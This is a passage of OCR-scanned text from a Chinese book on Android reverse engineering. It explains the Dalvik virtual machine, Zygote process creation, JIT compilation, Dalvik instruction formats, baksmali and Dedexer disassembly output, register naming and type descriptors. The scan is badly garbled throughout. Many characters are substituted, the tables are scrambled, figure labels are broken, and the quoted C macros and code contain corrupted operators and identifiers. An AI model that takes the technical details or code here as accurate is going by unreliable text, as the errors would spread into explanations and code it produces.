存 入 Java 栈 ， 与 之 类 似 的 有 lload、fload、dload 分 别 表示 将 long、float、dload 
类 型 的 数据 进 栈 ; 第 二 部 分 为 下 划 线 右边 的 数字 ， 表 示 要 操作 具体 哪个 局 
部 变量 ， 索 引 值 从 0 开始 计数 ，iload_1 表 示 将 第 二 个 int 类 型 的 局 部 变量 进 
栈 ， 这 里 第 二 个 局 部 变量 是 存放 在 局 部 变量 区 foo0 函 数 的 第 二 参数 。 同 
理 ， 第 2 条 指令 iload_2 取 第 二 个 参数 。 第 3 条 指令 iadd 从 栈 顶 弹出 两 个 int 类 型 
值 ， 将 值 相 加 ， 然 后 把 结果 压 回 栈 顶 。 第 4、5 条 指令 分 别 再 次 压 入 第 一 个 
参数 与 第 二 个 参数 。 第 6 条 指令 isub 从 栈 顶 弹出 两 个 int 类 型 值 ， 将 值 相 减 ， 
然后 把 结果 压 回 栈 顶 。 这 时 求 值 栈 上 有 两 个 int 值 了 。 第 7 条 指令 imul 从 栈 顶 
弹出 两 个 int 类 型 值 ， 将 值 相 乘 ， 然 后 把 结果 压 回 栈 顶 。 第 8 条 指令 ireturn 饮 


数 返 回 一 个 int 值 。 到 这 里 ，foo() 遂 数 就 执行 完了 。 关 于 Java 虚 拟 机 字 节 码 的 
其 它 内 容 ， 笔 者 在 此 就 不 展开 了 ， 读 者 可 以 在 以 下 网 址 找到 一 份 完整 的 Java 
字 节 码 指 令 列 表 
http://en.wikipedia.org/wiki/Java bytecode instruction listingso 

比 起 Java 虚 拟 机 字 节 码 ， 上 面 的 Dalvik 字 节 码 显得 简洁 很 多 ， 只 有 4 条 
目 令 就 完成 了 上 面 的 操作 。 第 一 条 指令 add-int 将 v3 与 v4 寄 存 器 的 值 相 加 ， 然 
后 保存 到 v0 寄 存 器 ， 整 个 指令 的 操作 中 使 用 到 了 三 个 参数 ，v3 与 v4 分 别 代 
表 foo0 国 数 的 第 一 个 参数 与 第 二 个 参数 ， 它 们 是 Dalv 这 字 节 码 参 数 表示 法 之 
一 V 命 名 法 ， 另 一 种 是 p 命 名 法 ， 本 章 3.2 小 节 会 详细 介绍 Dalvik 汇 编 语 言 。 
第 二 条 指令 sub-int 将 v3 减 去 v4 的 值 保 存 到 v1 寄 存 器 。 第 三 条 指令 mul- 
int/2addr 将 v0 乘 以 v1 的 值 保存 到 v0 寡 存 器 。 第 四 条 指令 返回 v0 的 值 。 

Dalv 迷 虚拟 机 运行 时 同样 为 每 个 线程 维护 一 个 PC 计数 器 与 调用 栈 ， 与 
Java 虚 拟 机 不 同 的 是 ， 这 个 调用 栈 维护 一 份 寄存 器 列表 ， 寄 存 器 的 数量 在 方 
法 结构 体 的 registers 字 段 中 给 出 ，Dalvik 虚 拟 机 会 根据 这 个 值 来 创建 一 份 虚 
拟 的 寄存 器 列表 。Dalvik 虚 拟 机 运行 时 的 状态 如 图 3-3 所 示 。 


PC 计数 器 
foo() EK Zi A 
偏 移 量 助词 符 
0000: add-int v0, v3, v4 虚拟 寄存 器 
0002: sub-int v1, v3, v4 vo 8 
PC —* 0004: mul-int/2addr v0, v1 vi Gad 
0005: return vO v2 
v3 5 
v4 3 


图 3-3 Dalvik YM 运行 状态 


通过 上 面 的 分 析 可 以 发 现 ， 基 于 宵 存 器 架构 的 Dalvik 虚 拟 机 与 基于 栈 染 
构 的 Java 虚 拟 机 相 比 ， 由 于 生成 的 代码 指令 减少 了 ， 程 序 执行 速度 会 更 快 一 


lis 
—o 


3.1.3 Dalvik 虚 拟 机 是 如 何 执行 程序 的 


Android 系 统 的 架构 采用 分 层 思想 ， 这 样 的 好 处 是 拥有 减少 各 层 之 间 的 
依赖 性 、 便 于 独立 分 发 、 容 易 收敛 问题 和 错误 等 优点 。Android 系 统 由 Linux 
内 核 、 孙 数 库 、Android 运 行 时 、 应 用 程序 框架 以 及 应 用 程序 组 成 。 如 图 3-4 
的 Android 系 统 架构 所 示 ，Dalvik 虚 拟 机 属于 Android 运 行 时 环境 ， 它 与 一 些 
核心 库 共 同 承 担 Android 应 用 程序 的 运行 工作 。 


APPLICATIONS 


Home Contacts Phone Browser 


APPLICATION FRAMEWORK 


à Window Content View 
Activity Manager Manager Providers System 


chemo Manitar Telephony Resource Location Notification 
Eain 一 一- Manager Manager Manager Manager 


LIBRARIES ANDROID RUNTIME 


Surface Manager Media SQLite 


Core Libraries 
Framework 


OpenGL | ES FreeType WebKit Machine 


SGL SSL libc 


LiNUX KERNEL 


Display c TAS Flash Memory Binder (IPC) 
Driver Camera Driver Driver Driver 


> Meise Audio Power 
Keypad Driver WiFi Drive Drivers Management 


图 3-4 Android 系 统 结构 


Android 系 统 启动 加 载 完 内 核 后 ， 第 一 个 执行 的 是 init 进 程 ，init 进 程 首 
先 要 做 的 是 设备 的 初始 化 工作 ， 然 后 读 取 inic.rc 文 件 并 启动 系统 中 的 重要 外 
部 程序 Zygote。Zygote 进 程 是 Android 所 有 进程 的 孵化 器 进程 ， 会 
首先 初始 化 Dalvik 虚 拟 机 ， 然 后 启动 system_server 并 进入 Zygote 模 式 ， 通 
socket 等 候 命 令 。 当 执行 一 个 Android 应 用 程序 时 ， UN. 


socket 方 式 发 送 命令 给 Zygote，Zygote 收 到 命令 后 通过 fork 自 身 创建 一 
Dalvik 虚 拟 机 的 实例 来 执行 应 用 程序 的 入 口 遂 数 ， 这 样 一 个 程序 amen 
了 。 整 个 流程 如 图 3-5 所 示 。 


执行 应 用 程序 


lEZygote3lt Fe 


图 3-5”Zygote 启 动 进程 


Zygote 提 供 了 三 种 创建 进程 的 方法 : 

e fork()， 创 建 一 个 Zygote 进 程 ; 

e forkAndSpecialize()， 创 建 一 个 非 Zygote 进 程 ; 

e forkSystemServer()， 创 建 一 个 系统 服务 进程 。 

其 中 ，Zygote 进 程 可 以 再 fork() 出 其 他 进程 ， 非 Zygote 进 程 则 不 能 fork 其 
他 进程 ， 而 系统 服务 进程 在 终止 后 它 的 子 进程 也 必须 终止 。 

当 进 程 fork 成 功 后 ， 执 行 的 工作 就 交 给 了 Dalvik 虚 拟 机 。Dalvik 虚 拟 机 
首先 通过 loadClassFromDex(O 函 数 完 成 类 的 装载 工作 ， 每 个 类 被 成 功 解析 后 
都 会 拥有 一 个 ClassObject 类 型 的 数据 结构 存储 在 运行 时 环境 中 ， 虚 拟 机 使 用 
gDvm.loadedClasses 全 局 哈 希 表 来 存储 与 查询 所 有 装载 进来 的 类 ， 随 后 ， 字 
节 人 码 验 证 器 使 用 dvmVerifyCodeFlow() 园 数 对 装 入 的 代码 进行 校 验 ， 接 着 虚 


拟 机 调用 FindClass0 国 数 查找 并 装载 main 方 法 类 ， 随 后 调用 dvmInterpretO 芳 
数 初始 化 解释 器 并 执行 字 节 码 流 。 整 个 过 程 如 图 3-6 所 示 。 
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图 3-6 ”Dalvik 虚 拟 机 执行 程序 流程 


3.1.4 ”关于 Dalvik 虚 拟 机 JIT (即时 编译 ) 


JIT (Just-in-time Compilation， 即 时 编译 ) ， 又 称 为 动态 编译 ， 是 一 种 
通过 在 运行 时 将 字 节 码 翻 译 为 机 器 码 的 技术 ， 使 得 程序 的 执行 速度 更 快 。 
Android 2.2 版 本 系统 的 Dalvik 虚 拟 机 引入 了 JIT 技 术 ， 官 方 宣称 新 版 的 Dalvik 
虚拟 机 比 以 往 执 行 速度 快 3~6 倍 。 

流 的 JIT 包 含 两 种 字 节 码 编译 方式 : 

e method 方 式 : 以 函数 或 方法 为 单位 进行 编译 。 

e trace 方式 : 以 trace 为 单位 进行 编译 。 

method 方 式 很 好 理解 ， 那 什么 是 trace 方 式 呢 ? 在 辆 数 中 一 般 很 少 是 顺 
序 执行 代码 的 ， 多 数 的 代码 都 分 成 了 好 几 条 执行 路 径 ， 其 中 函数 的 有 些 路 
径 在 实际 运行 过 程 中 是 很 少 被 执行 的 ， 这 部 分 路 径 被 称 为 “ 冷 路 径 >”， 而 执 
行 比较 频繁 的 路 径 被 称 为 * 热 路 径 >”。 采 用 传统 的 method 方 式 会 编译 整个 方 
法 的 代码 ， 这 会 使 得 在 “ 冷 路 径 ” 上 浪费 很 多 编译 时 间 ， 并 且 耗 费 更 多 的 内 
f£; trace 方 式 编译 则 能 够 快速 地 获取 “ 热 路 径 ” 代 码 ， 使 用 更 短 的 时 间 与 更 少 
的 内 存 来 编译 代码 。 

目前 ，Dalvik 虚 拟 机 默认 采用 trace 方 式 编译 代码 ， 同 时 也 支持 采用 
method 方 式 来 编译 。 关 于 JIT 的 详细 内 容 本 书 不 做 深入 的 探讨 ， 有 兴趣 的 读 
者 可 以 参看 其 它 相 关 资 料 。 


3.2 Dalvik 汇 编 语 言 基 础 为 分 析 Android 程 序 做 准备 


Dalvik 虚 拟 机 为 自己 专门 设计 了 一 套 指令 集 ， 并 且 制 定 了 自己 的 指令 
式 与 调用 规范 。 我 们 将 Dalvik 指 令 集 组 成 的 代码 称 为 Dalvik 汇 编 代 码 ， 将 这 
种 代码 表示 的 语言 称 为 Dalvik 汇 编 语 言 (Dalvik 汇 编 语言 并 不 是 正式 的 语 
言 ， 只 是 本 书 描述 Dalvik 指 令 集 代码 的 一 种 称呼 ) 。 本 节 主 要 介绍 Dalvik 汇 
编 语言 的 相关 基础 知识 。 


3.2.4 Dalvik 指 令 格式 


一 段 Dalvik 汇 编 代 码 由 一 系列 Dalvik 指 令 组 成 ， 指 令 语法 由 指令 的 位 描 
述 与 指令 格式 标识 来 决定 。 位 描述 约定 如 下 : 

e 每 16 位 的 字 采 用 空格 分 隔 开 来 。 

e 每 个 字母 表示 四 位 ， 每 个 字母 按 顺 序 从 高 字 节 开始 ， 排 列 到 低 字 
节 。 每 四 位 之 间 可 能 使 用 坚 线 “|}” 来 表示 不 同 的 内 容 。 

e 顺序 采用 A~Z 的 单个 大 写字 母 作为 一 个 4 位 的 操作 码 ，op 表 示 一 个 
8 位 的 操作 码 。 

e “Q” 来 表示 这 字段 所 有 位 为 0 值 。 

以 指令 格式 “A|Glop BBBB FIEIDIC” 为 例 : 

指令 中 间 有 两 个 空格 ， 每 个 分 开 的 部 分 大 小 为 16 位 ， 所 以 这 条 指令 
三 个 16 位 的 字 组 成 。 第 一 个 16 位 是 “AlGlop”， 高 8 位 由 A 与 G 组 成 ， 低 字 节 由 
操作 码 op 组 成 。 第 二 个 16 位 由 BBBB 组 成 ， 它 表示 一 个 16 位 的 偏 移 值 。 第 三 
个 16 位 分 别 由 F、E、D、C 共 四 个 4 字 节 组 成 ， 在 这 里 它们 表示 寄存 器 参 
数 。 

单独 使 用 位 标识 还 无 法 确定 一 条 指令 ， 必 须 通过 指令 格式 标识 来 指定 
指令 的 格式 编码 。 它 的 约定 如 下 : 

e 指令 格式 标识 大 多 由 三 个 字符 组 成 ， 前 两 个 是 数字 ， 最 后 一 个 是 字 
母 。 

e 第 一 个 数字 是 表示 指令 有 多 少 个 16 位 的 字 组 成 。 

e 第 二 个 数字 是 表示 指令 最 多 使 用 寄存 器 的 个 数 。 特 殊 标 记 “r" 标 识 使 
用 一 定 范 围 内 的 寄存 器 。 

e 第 三 个 字母 为 类 型 码 ， 表 示 指 令 用 到 的 额外 数据 的 类 型 。 取 值 见 表 
zle 


表 3-1 指令 格式 标识 的 类 型 码 


S 
cu 
zm 


立即 数 ， 有 符号 整数 或 32 位 浮 点 数 
立即 数 ， 有 符号 整数 或 64 位 双 精 度 浮 点 数 
方法 常量 〈 仅 对 静态 链接 格式 有 效 ) 


b 8 8 位 有 符号 立即 数 

c 16, 32 常量 池 索 引 

f 16 接口 常量 〈 仅 对 静态 链接 格式 有 效 ) 

h 有 符号 立即 数 〈32 位 或 64 位 数 的 高 值 位 ， 低 值 位 为 00 
i 

l 


n 4 位 的 立即 数 
s 16 短 整 型 立即 数 
t 8，16，32 Web. x 
X 


无 额外 数据 


还 有 一 种 特殊 的 情况 是 末尾 可 能 会 多 出 另 一 个 字母 ， 如 果 是 字母 s 表 示 
指令 采用 静态 链接 ， 如 果 是 字母 | 表示 指令 应 该 被 内 联 处 理 。 

以 指令 格式 标识 22x 为 例 : 

第 一 个 数字 2 表示 指令 有 两 个 16 位 字 组 成 ， 第 二 个 数字 2 表示 指令 使 用 
到 2 个 寄存 器 ， 第 三 个 字母 x 表示 没有 使 用 到 额外 的 数据 。 

另外 ，Dalvik 指 令 对 语法 做 了 一 些 说 明 ， 它 约定 如 下 : 

e 每 条 指令 从 操作 码 开 始 ， 后 面 紧 跟 参 数 ， 人 参数 个 数 不 定 ， 每 个 参数 
之 间 采 用 逗号 分 开 。 

e 每 条 指令 的 参数 从 指令 第 一 部 分 开始 ，op 位 于 低 8 位 ， 高 8 位 可 以 是 
一 个 8 位 的 参数 ， 也 可 以 是 两 个 4 位 的 参数 ， 还 可 以 为 空 ， 如 果 指 令 超 过 16 
位 ， 则 后 面部 分 依次 作为 参数 。 

e 如 果 参 数 采 用 “vX” 的 方式 表示 ， 表 明 它 是 一 个 寄存 器 ， 如 v0、Yv1l 
等 。 这 里 采用 v 而 不 用 r 是 为 了 避免 与 基于 该 虚拟 机 架构 本 身 的 寄存 器 命名 产 
生 冲 突 ， 如 ARM 架 构 寄存 器 命名 来 用 r 开 头 。 

e 如 果 人 参数 采用 “#+X2” 的 方式 表示 ， 表 明 它 是 一 个 常量 数字 。 

e ”如 果 参 数 采 用 “+X” 的 方式 表示 ， 表 明 它 是 一 个 相对 指令 的 地 址 偏 
移 。 

e 如果 参 数 采用 “kind@X” 的 方式 表示 ， 表 明 它 是 一 个 常量 闻 索 引 
值 。 其 中 kind 表 示 常 量 闻 类 型 ， 它 可 以 是 “string” (字符 串 常 量 池 索 引 ) 、 


“type”(〈 类 型 常量 池 索 引 ) 、“field” (字段 常量 池 索 引 ) 或 者 “meth” (方法 
常量 池 索 引 ) o 

以 指令 “op VAA, string( BBBB"7319l : 

指令 用 到 了 1 个 寄存 器 参数 vAA， 并 且 还 附加 了 一 个 字符 串 常量 池 索 引 
string@BBBB， 其 实 这 条 指令 格式 代表 着 const-string 指 令 。 

在 Android 4.0 源 码 Dalvik/docs 目 录 下 提供 了 一 份 文档 instruction- 
formats.html， 里 面 详细 列 举 了 Dalvik 指 令 的 所 有 格式 。 读 者 可 以 通过 它 了 解 
Dalvik 指 令 更 加 完整 的 信息 。 


注意 


在 Android 4.1 源 码 Dalvik/docs 目 录 中 ，instruction-formats.html 已 经 被 移 除 了 。 


322 ”DEX 文件 反 汇编 工具 


目前 DEX 可 执行 文件 主流 的 反 汇编 工具 有 BakSmali 与 Dedexer。 两 者 的 
反 汇 编 效 果 都 不 错 ， 在 语法 上 也 有 着 很 多 的 相似 处 。 下 面 通过 代码 对 比 两 
者 的 语法 差异 ， 测 试 代码 采用 上 一 节 的 Hello.java， 首 先 使 用 dx 工具 生成 
Hello.dex 文 件 ， 然 后 在 命令 提示 符 下 输入 以 下 命令 使 用 baksmali.jar 反 汇编 
Hello.dex: 

java -jar baksmali.jar -o baksmaliout Hello.dex 

命令 成 功 执行 会 在 baksmaliout 目 录 下 生成 Hello.smali 文 件 ， 使 用 文本 编 
辑 器 打开 它 ，foo0 函 数 代码 如 下 。 


# virtual methods 
.method public foo(II)I 
.registers 5 
.parameter 
.parameter 
.prologue 
.line 3 
add-int v0, pl, p2 
sub-int vl, pl, p2 
mul-int/2addr v0, v1 
return v0 


.end method 

执行 以 下 命令 使 用 ddx.jar (Dedexer 的 jar 文 件 ) 反 汇 编 Hello.dex: 

java -jar ddx.jar -d ddxout Hello.dex 

命令 成 功 执行 后 ， 会 在 ddxout 目 录 下 生成 Hello.ddx 文 件 ， 使 用 文本 编辑 
器 打开 它 ，foo0 函 数 代码 如 下 。 


.method public foo(II)I 
.limit registers 5 


; this: v2 (LHello;) 


; parameter[0] : v3 (I) 
; parameter[1] : v4 (I) 
.line 3 


add-int v0,v3,v4 
sub-int v1,v3,v4 
mul-int/2addr v0,v1 
return v0 
.end method 
两 种 反 汇编 代码 大 体 的 结构 组 织 是 一 样 的 ， 在 方法 名 、 字 段 类 型 与 代 
码 指令 序列 上 它们 保持 一 致 ， 具 体 的 差异 表现 在 一 些 语法 细节 上 。 对 比 之 
下 ， 可 以 发 现 如 下 不 同 点 : 


e 前 者 使 用 .registers 指 令 指 定 函 数 用 到 的 寄存 器 数目 ， 后 者 在 .registers 
指令 前 加 了 limit 前 缀 。 

e 前 者 使 用 寄存 器 p0 作 为 this 引 用 ， 后 者 使 用 寄存 器 v2 作 为 this 引 用 。 

e 前 者 使 用 一 条 .parameter 指 令 指 定 图 数 一 个 参数 ， 后 者 则 使 用 
parameter 数 组 指定 参数 寄存 器 。 

e 前 者 使 用 .prologue 指 令 指 定 函 数 代码 起 始 处 ， 后 者 却 没有 。 

e 两 者 寄存 器 表示 法 不 同 ， 前 者 使 用 p 命 名 法 ， 后 者 使 用 v 命 名 法 。 

(具体 差异 下 一 节 进 行 讲 解 ) 

BakSmali 提 供 反 汇编 功能 的 同时 ， 还 支持 使 用 Smali 工 具 打 包 反 汇编 代 
码 重 新 生成 ex 文件 ， 这 个 功能 被 广泛 应 用 于 apk 文 件 的 修改 、 补 丁 、 破 解 
等 场合 ， 因 而 更 加 受到 开发 人 员 的 青睐 ， 本 书 Dalvik 指 令 的 语法 将 采用 
Smali 语 法 格式 。 


3.23 ”了解 Dalvik 寄 存 器 


Dalvik 虚 拟 机 基于 寄存 器 架构 ， 在 代码 中 大 量 地 使 用 到 了 寄存 器 。 
Dalvik 虚 拟 机 是 作用 于 特定 架构 的 CPU 上 运行 的 ， 在 设计 之 初 采 用 了 ARM 
架构 ，ARM 架 构 的 CPU 本 身 集成 了 多 个 寄存 器 ，Dalvik 将 部 分 寄存 器 映射 
到 了 ARM 寄 存 器 上 ， 还 有 一 部 分 则 通过 调用 栈 进 行 模 拟 。 注 意 : Dalvik 中 
用 到 的 寄存 器 都 是 32 位 的 ， 支 持 任 何 类 型 ，64 位 类 型 用 2 个 相 邻 寄存 器 表 
7]vo 

Dalvik 虚 拟 机 支持 多 少 个 虚拟 寄存 器 呢 ? 通过 查看 Dalvik 指 令 格 式 表 ， 
可 以 发 现 类 似 “gglop AAAA BBBB” 的 指令 ， 它 的 语法 为 “op vAAAA, 
vBBBB”， 其 中 每 个 大 写字 母 代表 4 位 ，AAAA、BBBB 最 大 值 是 2 的 16 次 方 
即 65536， 寄 存 器 采用 v0 作 起 始 值 ， 因 此 ， 它 的 取 值 范围 是 v0~v65535。 

Dalvik 虚 拟 机 又 是 如 何 虚 拟 地 使 用 寄存 器 的 呢 ? 这 个 还 得 从 上 面 章节 讲 
到 的 Dalvik 虚 拟 机 的 调用 栈 说 起 ，Dalvik 虚 拟 机 为 每 个 进程 维护 一 个 调用 
栈 ， 这 个 调用 栈 其 中 一 个 作用 就 是 用 来 “虚拟 ”寄存 器 ， 由 上 一 节 我 们 知 
道 ， 每 个 函数 都 在 函数 头 部 使 用 .registers 指 令 指 定 函数 用 到 的 寄存 器 数目 ， 


当 虚 拟 机 执行 到 这 个 函数 时 ， 会 根据 寄存 器 的 数目 分 配 适 当 的 栈 空间 ， 这 
些 空间 就 是 用 来 存放 寄存 器 实际 的 值 的 ! 虚拟 机 通过 处 理 字 节 码 ， 对 寄存 
器 进入 读 与 写 的 操作 ， 其 实 都 是 在 写 栈 空间 。Android SDK 中 有 一 个 名 为 
dalvik.bytecode.Opcodes 的 接口 ， 它 定义 了 一 份 完 整 的 Dalvik 字 节 码 列表 。 处 
理 这 些 字 节 码 的 函数 为 一 个 宏 HANDLE_OPCODE0O ， 这 份 Dalvik 字 节 码 列 
表 中 每 个 字 节 码 的 处 理 过 程 可 以 在 Android 源 码 的 dalvik\vm\mterp\c 目 录 中 找 


到 ， 拿 OP_MOVE 来 举例 ，OP_MOVE.cpp 内 容 如 下 : 
HANDLE OPCODE($opcode /*vA, vB*/) 
vdst - INST A(inst); 
vsrcl - INST B(inst); 
ILOGV("|move$s v$d,v$d $s(v$d-0x$08x)", 
(INST INST(inst) == OP MOVE) ? "" : "-obgject", vast; vsrcl, 
kSpacing, vdst, GET REGISTER(vsrc1)); 
SET REGISTER(vdst, GET REGISTER(vsrc1)); 
FINISH(1); 
OP END 


INST_A 是 用 来 获取 vA 寡 存 器 地 址 的 宏 ， 右 边 的 A 表 示 寄 存 器 的 “名 
称 ”， 可 以 是 其 他 的 字母 或 长 度 ， 如 INST_AA、INST_B 等 分 别 是 获取 vAA 
与 VB 的 地 址 。 在 OP_MOVE.cpp 文 件 同 目录 的 header.cpp 文 件 中 ，INST_A 与 


INST_B 的 声明 如 下 : 
#define INST A( inst) ((( inst) »» 8) & OxOf) 


#define INST B( inst) ((Linst) »» 12) 

这 里 的 _inst 为 一 个 16 位 的 指令 ，INST_A 将 _inst 右 移 8 位 然后 与 0x0f 相 
与 ， 也 就 是 获取 了 _inst 高 8 位 的 低 4 位 作为 vdst 的 值 ， 而 INST_B 将 _inst 右 移 
12 位 ， 也 就 是 获取 _inst 的 最 高 4 位 作为 vsrc1 的 值 。 

ILOGV 用 来 输出 调试 信息 。 

SET_REGISTER 用 来 设置 寄存 器 的 值 ，GET_REGISTER 用 来 获取 寄存 
器 的 值 。 另 外 ， 操 作 的 寄存 器 可 以 是 其 它 的 大 小 与 类 型 ， 如 WIDE、 
FLOAT , 相关 的 安国 数 则 是 GET REGISTER WIDE 、 
GET REGISTER FLOAT o 在 headercpp X {F 中 ， GET REGISTER 与 
SET_REGISTER 的 声明 如 下 : 


# define GET REGISTER(_ idx) (folt 3dx) 1) 

# define SET REGISTER( idx, | val) (fp[( idx)] = (.val)) 

印 为 ARM 栈 帧 寄存 器 ， 在 虚拟 机 运行 到 某 个 函数 时 它 指向 函数 的 局 部 
变量 区 ， 其 中 就 维护 着 一 份 寄存 器 值 的 列表 ，GET_REGISTER 宏 以 _idx 为 
索引 返回 一 个 “寄存 器 ”的 值 ， 而 SET_REGISTER 则 是 以 _idx 为 索引 ， 设 置 相 
应 寄存 器 的 值 。 如 果 Dalvik 虚 拟 机 开启 了 寄存 器 数目 验证 ， 即 #ifdef 
CHECK_REGISTER_INDICES 为 真 时 ， 在 进行 寄存 器 读 写 操作 时 ， 虚 拟 机 
会 首先 判断 idx 是 否 小 于 curMethod->registersSize ， 如 果 条 件 不 成 立 则 说 明 
寄存 器 超出 引用 范围 ， 此 时 虚拟 机 会 通过 assert(!"bad reg) 抛 出 异常 。 

最 后 ， 由 FINISH 宏 来 完成 一 条 指令 的 执行 。FINISH 的 功能 
ADJUST_PC 安 来 完成 ， 主 要 是 计算 当前 指令 占用 的 长 度 ， 然 后 将 PC 寄存 器 
加 上 计算 出 的 偏 移 ， 这 样 一 条 指令 执行 完成 后 ，PC 计 数 器 会 指向 下 一 条 将 
要 执行 的 指令 。 


324 两 种 不 同 的 奇 存 吕 表示 方法 


前 面 曾 多 次 提 到 v 命 名 法 与 p 命 名 法 ， 它 们 是 Dalvik 字 节 码 中 两 种 不 同 的 
寄存 器 表示 方法 。 下 面 我 们 来 看 看 ， 它 们 在 表现 上 有 一 些 什么 样 的 区 别 。 

假设 一 个 函数 使 用 到 M 个 寄存 器 ， 并 且 该 轴 数 有 N 个 参数 ， 根 据 Dalvik 
虚拟 机 参数 传递 方式 中 的 规定 : 参数 使 用 最 后 的 N 个 寄存 器 中 ， 局 部 变量 使 
用 从 v0 开 始 的 前 M-N 个 寄存 器 。 如 前 面 的 小 节 中 ，foo0 函 数 使 用 到 了 5 个 寄 
存 器 ，2 个 显 式 的 整形 参数 ， 其 中 foo0 函 数 是 Hello 类 的 非 静态 方法 ， 函 数 被 
调用 时 会 传 入 一 个 隐 式 的 Hello 对 象 引 用 ， 因 此 ， 实 际 传 入 的 参数 数量 是 3 
个 。 根 据 传 参 规则 ， 局 部 变量 将 使 用 前 2 个 寄存 器 ， 人 参数 会 使 用 后 3 个 寄存 
Ao 

v 命 名 法 采用 以 小 写字 母 “w 开 头 的 方式 表示 函数 中 用 到 的 局 部 变量 与 
参数 ， 所 有 的 寄存 器 命名 从 v0 开 始 ， 依 次 递增 。 对 于 foo0 函 数 ，v 命 名 法 会 
用 到 v0、v1、v2、v3、v4 等 五 个 寄存 器 ，v0 与 v1 用 来 表示 函数 的 局 部 变量 


v 命 名 法 与 p 命 


寄存 器 ，v2 表 示 被 传 入 的 Hello 对 象 的 引用 ，v3 与 v4 分 别 表 示 两 个 传 入 的 整 
形 参 数 。 

p 命 名 法 对 函数 的 局 部 变量 寄存 器 命名 没有 影响 ， 它 的 命名 规则 是 : BÉ 
数 中 引入 的 参数 命名 从 p0 开 始 ， 依 次 递增 。 对 于 foo0) 函 数 ，p 命 名 法 会 用 到 
v0、vV1、p0、pl、p2 等 五 个 寄存 器 ，v0 与 V1 同样 用 来 表示 遂 数 的 局 部 变量 
寄存 器 ，p0 表 示 被 传 入 的 Hello 对 象 的 引用 ，p1 与 p2 分 别 表 示 两 个 传 入 的 整 
形 参 数 。 

对 于 有 M 个 寄存 器 及 N 个 参数 的 函数 foo0) 来 说 ，v 命 名 法 与 p 命 名 法 的 表 
现形 式 如 表 3-2 所 示 。 通 过 观察 可 以 发 现 ， 使 用 p 命 名 法 表示 的 Dalvik 汇 编 代 
码 ， 通 过 寄存 器 的 前 缀 更 容易 判断 寄存 器 到 底 是 局 部 变量 寄存 器 还 是 参数 
寄存 器 ， 在 Dalvik 汇 编 代 码 较 长 、 使 用 寄存 器 较 多 的 情况 下 ， 这 种 优势 将 更 
加 明显 。 


表 3-2 ”vy 命名 法 与 p 命 名 法 


v 命名 法 p 命名 法 寄存 器 含义 
v0 v0 第 一 个 局 部 变量 寄存 器 
vl vl 第 二 个 局 部 变量 寄存 器 
T 中 间 的 局 部 变量 寄存 器 依次 递增 且 名 称 相 同 
vM-N pO 第 一 个 参数 寄存 器 
RT. 2 中 间 的 参数 寄存 器 分 别 依次 递增 
vM-I pN-1 第 N 个 参数 寄存 器 


3.25 ”Dalvik 字 节 码 的 类 型 、 方 法 与 字段 表示 方法 


Dalvik 字 节 码 有 着 一 套 自己 的 类 型 、 方 法 与 字段 表示 方法 ， 这 些 方法 与 
Dalvik 虚 拟 机 指令 集 一 起 组 成 了 一 条 条 的 Dalvik 汇 编 代码 。 

1。 类 型 

Dalvik 字 节 码 只 有 两 种 类 型 ， 基 本 类 型 与 引用 类 型 。Dalvik 使 用 这 两 种 
类 型 来 表示 Java 语 言 的 全 部 类 型 ， 除 了 对 象 与 数组 属于 引用 对 象 外 ， 其 他 的 
Java 类 型 都 是 基本 类 型 。BakSmali 严 格 遵守 了 DEX 文 件 格式 中 的 类 型 描述 符 


(DEX 文 件 格 式 将 在 第 四 章 进 行 介绍 ) 定义 。 类 型 描述 符 对 照 如 表 3-3 所 
ap 
表 3-3 ”Dalvik 字 节 码 类 型 描述 符 


语 法 E X 
void， 只 用 于 返回 值 类 型 


boolean 


byte 
short 


char 


int 


long 

float 

double 

Java 类 类 型 


数组 类 型 


—|ciUuimij-|-|jo|n|juwiNI|-« 


每 个 Dalvik 寄 存 器 都 是 32 位 大 小 ， 对 于 小 于 或 等 于 32 位 长 度 的 类 型 来 
说 ， 一 个 寄存 器 就 可 以 存放 该 类 型 的 值 ， 而 像 J、DD 等 64 位 的 类 型 ， 它 们 的 
值 是 使 用 相 邻 两 个 寄存 器 来 存储 的 ， 如 v0 与 v1、v3 与 v4 等 。 

L 类 型 可 以 表示 Java 类 型 中 的 任何 类 。 这 些 类 在 Java 代 码 中 以 
package.name.ObjectName 方 式 引 用 ， 到 了 Dalvik 汇 编 代码 中 ， 它 们 以 
Lpackage/name/ObjectrName; 形 式 表 示 ， 注 意 最 后 有 个 分 号 ，L 表 示 后 面 跟 着 
一 个 Java 类 ，package/mame/ 表 示 对 象 所 在 的 包 ，ObjectrName 表 示 对 象 的 名 
称 ， 最 后 的 分 号 表示 对 象 名 结束 。 例 如 : Ljava/lang/String; 相 当 于 
java.lang.Stringo 

[类 型 可 以 表示 所 有 基本 类 型 的 数组 。[ 后 面 紧 跟 基本 类 型 描述 符 ， 如 [I 
表示 一 个 整 型 一 维 数 组 ， 相 当 于 Java 中 的 int[]。 多 个 [在 一 起 时 可 用 来 表示 多 
维 数组 ， 如 [[I 表 示 int[][]，[[[I 表 示 int[][][]。 注 意 多 维 数组 的 维 数 最 大 为 255 


个 
[`o 


L 与 [可 以 同时 使 用 用 来 表示 对 象 数 组 。 如 [Ljava/lang/String; 就 表示 Java 
中 的 字符 串 数组 。 


2. 方法 

方法 的 表现 形式 比 类 名 要 复杂 一 些 ，Dalvik 使 用 方法 名 、 类 型 参数 与 返 
回 值 来 详细 描述 一 个 方法 。 这 样 做 一 方面 有 助 于 Dalvik 虚 拟 机 在 运行 时 从 方 
法 表 中 快速 地 找到 正确 的 方法 ， 另 一 方面 ，Dalvik 虚 拟 机 也 可 以 使 用 它们 来 
做 一 些 静 态 分 析 ， 比 如 Dalvik 字 节 码 的 验证 与 优化 。 

方法 格式 如 下 : 

Lpackage/name/ObjectName;-» MethodName(III)Z 

在 这 个 例子 中 ，Lpackage/name/ObjectName;- 应 该 理解 为 一 个 类 型 , 
MethodName 为 具体 的 方法 名 ，(IDZ 是 方法 的 签名 部 分 ， 其 中 括号 内 的 II 为 
方法 的 参数 〈 在 此 为 三 个 整 型 参数 ) ，Z 表 示 方 法 的 返回 类 型 (boolean 类 
型 ) 。 

下 面 是 一 个 更 为 复杂 的 例子 : 

method (I[ [IILjava/lang/string; [Ljava/lang/Object; )Ljava/lang/String; 

按照 上 面 的 知识 ， 将 其 转换 成 Java 形 式 的 代码 应 该 为 : 

String method(int, int[][], int, String, Object[]) 

BakSmali 生 成 的 方法 代码 以 .method 指 令 开 始 ， 以 .end method 指 令 结 
